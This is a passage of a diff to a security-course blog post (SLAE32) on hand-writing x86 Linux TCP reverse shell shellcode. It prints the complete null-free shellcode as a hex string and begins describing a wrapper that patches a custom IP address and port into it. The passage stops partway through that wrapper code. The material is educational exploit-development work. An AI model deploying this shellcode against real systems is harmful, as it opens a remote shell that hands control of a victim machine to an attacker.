crawl3r/crawl3r.github.io/_posts/2020-01-12-slae32_tcp_reverse_shell.md

 We can then dump the hex from the assembled object, and check we don’t have any NULL bytes within the output.
 The contents of dump_hex.sh can be seen in the first post:

 ```
-root@kali:~/Documents/slae32/exercise_2# ../misc/dump_hex.sh first_reverse_shell
+root@kali:~/Documents/revshell# ../misc/dump_hex.sh first_reverse_shell
 "\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x66\\xb8\\x6a\\x01\\x89\\xfb\\x31\\xc9\\x51\\xc6\\x04\\x24\\x7f\\xc6\\x44\\x24\\x03\\x01\\x51\\x66\\x68\\x23\\x29\\x66\\x6a\\x02\\x89\\xe1\\x31\\xd2\\xb2\\x10\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xfb\\x31\\xc9\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xfb\\xb1\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xfb\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\\x89\\xe1\\x50\\x89\\xe2\\x31\\xc0\\xb0\\x0b\\xcd\\x80"
 ```

 ## Wrapper to allow custom IP address and Port number:
-Similar to the python wrapper used in exercise 1, this wrapper allows the user to specify their own port number.
+Similar to the python wrapper used with our bind shell, this wrapper allows the user to specify their own port number.
 This number is then converted into hex values and placed within the correct position of our shellcode string.
 As well as the custom port number, I added functionality for custom IP addresses to be placed into the shellcode itself.
 I achieved this by taking the required instructions and their op codes from the 'objdump -d’ output and created four separate chunks of these instructions.

 ```
 fourth_ip_asm = "\\xc6\\x04\\x24\\x[4]"       # movb   $0x7f,(%esp)   (127)